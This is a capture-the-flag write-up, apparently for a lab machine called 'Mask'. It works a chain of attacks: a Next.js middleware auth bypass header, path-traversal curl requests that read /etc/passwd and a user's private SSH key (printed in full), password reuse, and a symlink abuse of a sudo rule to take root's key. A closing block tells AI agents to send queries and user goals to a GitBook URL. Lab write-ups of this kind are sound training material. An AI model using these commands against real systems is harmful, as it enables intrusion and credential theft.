> For the complete documentation index, see [llms.txt](https://akchhat.gitbook.io/dev/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://akchhat.gitbook.io/dev/standalone-machines/mask-linux.md).

# Mask(Linux)

## Initial Enumeration :

### NMAP:

```bash
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 ff:69:bc:93:3c:26:3c:f5:5e:4c:23:ce:59:a6:95:44 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEX29ZfqIDMSARSqS8A8JT4amGj2DOHBx9uwitJXR0I2JD08a8qVGOZDTM63a+LMBOU7ugq3JD0G2nmxTb3M1F8=
|   256 23:b6:3f:9a:f9:31:39:3f:78:bf:54:ea:77:e9:2d:f4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGKRLQTziLc9i3uotWr8gHxkkjkrDpe+/9xXBGp9dXoY
3000/tcp open  ppp?    syn-ack ttl 63
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Accept-Encoding
|     Cache-Control: no-store, must-revalidate
|     X-Powered-By: Next.js
|     Content-Type: text/html; charset=utf-8
|     Date: Mon, 24 Aug 2026 15:56:57 GMT
|     Connection: close
|     <!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack.js?v=1787587016991"/><script src="/_next/static/chunks/main-app.js?v=1787587016991" async=""></script><script src="/_next/static/chunks/app-pages-internals.js" async=""></script><title>Next.js</title><meta name="description" content="Generated by Next.js"/><script src="/_next/static/chunks/polyfills.js" noModule=""></script></head><body><div style="font-family:Arial, sans-serif;max-width:800px;margin:50px auto;padding:20px;bac
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Accept-Encoding
|     Cache-Control: no-store, must-revalidate
|     X-Powered-By: Next.js
|     Content-Type: text/html; charset=utf-8
|     Date: Mon, 24 Aug 2026 15:57:02 GMT
|     Connection: close
|     <!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack.js?v=1787587022706"/><script src="/_next/static/chunks/main-app.js?v=1787587022706" async=""></script><script src="/_next/static/chunks/app-pages-internals.js" async=""></script><title>Next.js</title><meta name="description" content="Generated by Next.js"/><script src="/_next/static/chunks/polyfills.js" noModule=""></script></head><body><div style="font-family:Arial, sans-serif;max-width:800px;margin:50px auto;padding:20px;bac
|   Help, NCP: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.99%I=7%D=8/24%Time=6A8C69CE%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,1C0D,"HTTP/1\.1\x20200\x20OK\r\nVary:\x20RSC,\x20Next-Router-S
SF:tate-Tree,\x20Next-Router-Prefetch,\x20Accept-Encoding\r\nCache-Control
SF::\x20no-store,\x20must-revalidate\r\nX-Powered-By:\x20Next\.js\r\nConte
SF:nt-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Mon,\x2024\x20Aug\x
SF:202026\x2015:56:57\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20h
SF:tml><html\x20lang=\"en\"><head><meta\x20charSet=\"utf-8\"/><meta\x20nam
SF:e=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\"/><
SF:link\x20rel=\"preload\"\x20as=\"script\"\x20fetchPriority=\"low\"\x20hr
SF:ef=\"/_next/static/chunks/webpack\.js\?v=1787587016991\"/><script\x20sr
SF:c=\"/_next/static/chunks/main-app\.js\?v=1787587016991\"\x20async=\"\">
SF:</script><script\x20src=\"/_next/static/chunks/app-pages-internals\.js\
SF:"\x20async=\"\"></script><title>Next\.js</title><meta\x20name=\"descrip
SF:tion\"\x20content=\"Generated\x20by\x20Next\.js\"/><script\x20src=\"/_n
SF:ext/static/chunks/polyfills\.js\"\x20noModule=\"\"></script></head><bod
SF:y><div\x20style=\"font-family:Arial,\x20sans-serif;max-width:800px;marg
SF:in:50px\x20auto;padding:20px;bac")%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x
SF:20Request\r\nConnection:\x20close\r\n\r\n")%r(NCP,2F,"HTTP/1\.1\x20400\
SF:x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,1C0D,
SF:"HTTP/1\.1\x20200\x20OK\r\nVary:\x20RSC,\x20Next-Router-State-Tree,\x20
SF:Next-Router-Prefetch,\x20Accept-Encoding\r\nCache-Control:\x20no-store,
SF:\x20must-revalidate\r\nX-Powered-By:\x20Next\.js\r\nContent-Type:\x20te
SF:xt/html;\x20charset=utf-8\r\nDate:\x20Mon,\x2024\x20Aug\x202026\x2015:5
SF:7:02\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html><html\x20l
SF:ang=\"en\"><head><meta\x20charSet=\"utf-8\"/><meta\x20name=\"viewport\"
SF:\x20content=\"width=device-width,\x20initial-scale=1\"/><link\x20rel=\"
SF:preload\"\x20as=\"script\"\x20fetchPriority=\"low\"\x20href=\"/_next/st
SF:atic/chunks/webpack\.js\?v=1787587022706\"/><script\x20src=\"/_next/sta
SF:tic/chunks/main-app\.js\?v=1787587022706\"\x20async=\"\"></script><scri
SF:pt\x20src=\"/_next/static/chunks/app-pages-internals\.js\"\x20async=\"\
SF:"></script><title>Next\.js</title><meta\x20name=\"description\"\x20cont
SF:ent=\"Generated\x20by\x20Next\.js\"/><script\x20src=\"/_next/static/chu
SF:nks/polyfills\.js\"\x20noModule=\"\"></script></head><body><div\x20styl
SF:e=\"font-family:Arial,\x20sans-serif;max-width:800px;margin:50px\x20aut
SF:o;padding:20px;bac");
```

### Port 3000(Web Server):

* We see a web server being hosted on port `3000` so we go ahead and have a look at it

<figure><img src="https://2197347825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC6n34hlfG54bn1tXGfsK%2Fuploads%2FWjItdaq9AVWhuyQ2GHcv%2Fimage.png?alt=media&amp;token=3db042d4-5b79-43da-aa18-f0d538e4ad7b" alt=""><figcaption></figcaption></figure>

* This seemed to be a corporate document management system and the `access system` button redirected us to the login page.

<figure><img src="https://2197347825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC6n34hlfG54bn1tXGfsK%2Fuploads%2FqEamzPE89PbrxsMfDbbE%2Fimage.png?alt=media&amp;token=46cc4139-1760-4532-85f5-57570caf1ddc" alt=""><figcaption></figcaption></figure>

* Now we had a look at our `wappalyzer` plugin to check the tech stack.

<figure><img src="https://2197347825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC6n34hlfG54bn1tXGfsK%2Fuploads%2FgBoW4GHuDNmz6dXaaSBS%2Fimage.png?alt=media&amp;token=8f70536d-d608-403e-86c1-3148281d37a1" alt=""><figcaption></figcaption></figure>

* It was found that this server was being hosted on `next.js` and the version was `14.2.0` and this was an Important piece of Information found so we have a look at the web for any Publicly disclosed existing exploit for this specific Version of `next.js` .
* After a bit of Research we found out that this specific version is vulnerable to a critical Auth Bypass Vulnerability

{% embed url="<https://vercel.com/blog/postmortem-on-next-js-middleware-bypass>" %}

* Now we try completely bypassing the Login panel and trying to access the dashboard using `curl` command

```jsx
┌──(kali㉿kali)-[~/Desktop/ronin66/mask]
└─$ curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://172.16.18.20:3000/dashboard      
{"error":"Parameter file not found"}
```

* It gives us an error which is a little verbose and tells us that there is a parameter named `file` which is present and required.
* Even after giving an empty `file` parameter, it gave the same error.

```jsx
┌──(kali㉿kali)-[~/Desktop/ronin66/mask]
└─$ curl -s -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" "http://172.16.18.20:3000/dashboard?file="           
{"error":"Parameter file not found"}
```

* Here, we tried using normal path traversal payload but it redirected us to the `/login` endpoint.

```jsx
┌──(kali㉿kali)-[~/Desktop/ronin66/mask]
└─$ curl -s -H --path-as-is "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" "http://172.16.18.20:3000/dashboard?file=../../../../etc/passwd"
/login      
```

* So we gave it a little more `../` traversal payload and this time interestingly it returned the `/etc/passwd` file for us.

```jsx
┌──(kali㉿kali)-[~/Desktop/ronin66/mask]
└─$ curl -s -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \ 
  "http://172.16.18.20:3000/dashboard?file=../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:102:1::/var/cache/pollinate:/bin/false
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
syslog:x:103:104::/nonexistent:/usr/sbin/nologin
uuidd:x:104:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:105:107::/nonexistent:/usr/sbin/nologin
tss:x:106:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:107:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
jim:x:1000:1000:jim:/home/jim:/bin/bash
jacky:x:1001:1001:,,,:/home/jacky:/bin/bash
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
```

## Shell as `jim` :

* Now since we found out that there is a path traversal vulnerability present we tried to get the SSH private key of both the user `jacky` and `jim` .

```jsx
┌──(kali㉿kali)-[~/Desktop/ronin66/mask]
└─$ curl -s -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  "http://172.16.18.20:3000/dashboard?file=../../../../home/jacky/.ssh/id_rsa"
{"error":"File not found"}
```

* It didn’t work for the user `jacky` and now we tried for another user which is `jim`

```jsx
┌──(kali㉿kali)-[~/Desktop/ronin66/mask]
└─$ curl -s -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  "http://172.16.18.20:3000/dashboard?file=../../../../home/jim/.ssh/id_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----
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
Y1m69W8OixmsEAAAALamltQGVhcnRoMDI=
-----END OPENSSH PRIVATE KEY-----
```

* This time we had successfully received the private SSH key for the user `jim` and now we save it on our attacker machine as `id_rsa` .

<figure><img src="https://2197347825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC6n34hlfG54bn1tXGfsK%2Fuploads%2FwCMfeJ66ZUFrivIfNuzR%2Fimage.png?alt=media&amp;token=febf8e35-6a4f-4561-9c2e-284911df5c07" alt=""><figcaption></figcaption></figure>

```jsx
┌──(kali㉿kali)-[~/Desktop/ronin66/mask]
└─$ chmod 600 id_rsa
```

* After accessing the machine using `SSH` we get our `user.flg`&#x20;

<figure><img src="https://2197347825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC6n34hlfG54bn1tXGfsK%2Fuploads%2FnGPRNDzlQ95tYJQrEOBc%2Fimage.png?alt=media&amp;token=1f35f080-6763-4663-b360-dad01da0f6be" alt=""><figcaption></figcaption></figure>

* Now we start enumerating the machine for any interesting files.

## Access as `jacky` :

* While enumerating the machine, we found a `config.txt` file on the machine in the `corporate-document-management` directory and this contained sensitive credentials.

<figure><img src="https://2197347825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC6n34hlfG54bn1tXGfsK%2Fuploads%2FwwCcIWVE69WQnrQEClgg%2Fimage.png?alt=media&amp;token=4170b751-f40d-466e-9e5c-6714d5909498" alt=""><figcaption></figcaption></figure>

* Now first we tried authenticating on the Web Server using the Admin credentials we found and also these credentials were valid and it was confirmed using the `/api/auth` endpoint, we were not redirected to the `dashboard` endpoint on the page.

<figure><img src="https://2197347825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC6n34hlfG54bn1tXGfsK%2Fuploads%2FxWQCTtPXmiwxDAmDKkS0%2Fimage.png?alt=media&amp;token=6b256697-1c3d-4c6d-bdcd-3eb5a0963654" alt=""><figcaption></figcaption></figure>

* Then after struggling for a while we had an idea to run `linpeas.sh` script to find any other interesting attack vector.
* Here in the `linpeas` output we found that our user was allowed to `cat` the file `/home/jacky/notes/todo.txt` with `sudo` privileges.

<figure><img src="https://2197347825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC6n34hlfG54bn1tXGfsK%2Fuploads%2FtOT7P54rfMhQnWOpZGFX%2Fimage.png?alt=media&amp;token=f1c6d299-d514-4d81-92d1-ed3b3235eb5e" alt=""><figcaption></figcaption></figure>

* Now, we go ahead and check the content of the file.

<figure><img src="https://2197347825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC6n34hlfG54bn1tXGfsK%2Fuploads%2Fm2R2hgJHYy0vlMNzW66x%2Fimage.png?alt=media&amp;token=7459af6a-40f2-4323-90d9-765a4ac9ed29" alt=""><figcaption></figcaption></figure>

* Now this doesn’t seemed to be interesting as we didn’t have write permissions and we couldn’t edit the file so we stop for a while and step back and think again.
* We then tried the Admin Password which was retrieved from the `config.txt` for the user `jacky` and it worked!!

<figure><img src="https://2197347825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC6n34hlfG54bn1tXGfsK%2Fuploads%2FpkRsVwKR9MOHmNOUov8A%2Fimage.png?alt=media&amp;token=a6148881-9b23-4ac3-b8bc-131a55f9704c" alt=""><figcaption></figcaption></figure>

* At this point we had access to the `notes` directory which had the `todo.txt` .

<figure><img src="https://2197347825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC6n34hlfG54bn1tXGfsK%2Fuploads%2FSUuih26OHyLWD7YjiP6X%2Fimage.png?alt=media&amp;token=9128a482-b9b0-42ac-a130-12c3220f2cc5" alt=""><figcaption></figcaption></figure>

## Access as `root` :

* Now to move to `root` , we created a symlink pointing to `/root/.ssh/authorized_keys` yo get the root user’s private SSH keys and name it as `todo.txt`
* For this to work we first removed the original `todo.txt`

```jsx
jacky@earth02:~/notes$ rm todo.txt 
```

* Now we go ahead and create a `symlink`

```jsx
jacky@earth02:~/notes$ ln -s /root/.ssh/id_rsa todo.txt
```

* Now as `jacky` user we were not able to access this file due to the permission issues and got an `Access Denied` message.
* So we open a new terminal and again SSH into the machine as the `jim` user and cat the file using `sudo` permissions

<figure><img src="https://2197347825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC6n34hlfG54bn1tXGfsK%2Fuploads%2FWPcH0ejuMRZZvTvF89qY%2Fimage.png?alt=media&amp;token=96f2c8f9-d425-4823-9c6f-01aae8628800" alt=""><figcaption></figcaption></figure>

* Now we were successfully able to retrieve the root user’s private SSH key so we copy it on our attacker machine and give necessary permissions.

```jsx
┌──(kali㉿kali)-[~/Desktop/ronin66/mask]
└─$ nano root_id_rsa
                                                                                                                                                                                
┌──(kali㉿kali)-[~/Desktop/ronin66/mask]
└─$ chmod 600 root_id_rsa   

```

* Now we were successfully able to SSH into the Machine as the `root` user and finally got our `root.flg` .

<figure><img src="https://2197347825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC6n34hlfG54bn1tXGfsK%2Fuploads%2FXrViPY0LdqknC2l3RjI7%2Fimage.png?alt=media&amp;token=46455a15-39f2-4003-8a3e-3069e7d877ed" alt=""><figcaption></figcaption></figure>

* We have now successfully solved this machine!!!


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://akchhat.gitbook.io/dev/standalone-machines/mask-linux.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `automate deployments from our CI pipeline` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
